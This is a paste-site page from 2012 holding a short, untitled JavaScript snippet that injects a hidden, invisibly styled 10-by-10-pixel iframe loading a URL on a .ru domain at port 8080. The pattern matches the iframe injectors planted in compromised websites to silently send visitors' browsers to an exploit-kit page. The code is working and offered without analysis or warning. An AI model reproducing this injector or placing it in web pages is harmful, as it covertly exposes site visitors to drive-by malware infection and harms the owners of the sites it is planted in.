
Untitled
By: a guest on
Jun 15th, 2012 | syntax:
JavaScript | size: 0.65 KB | hits: 28 | expires: Never
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://saprolaunimaxim.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','http://saprolaunimaxim.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}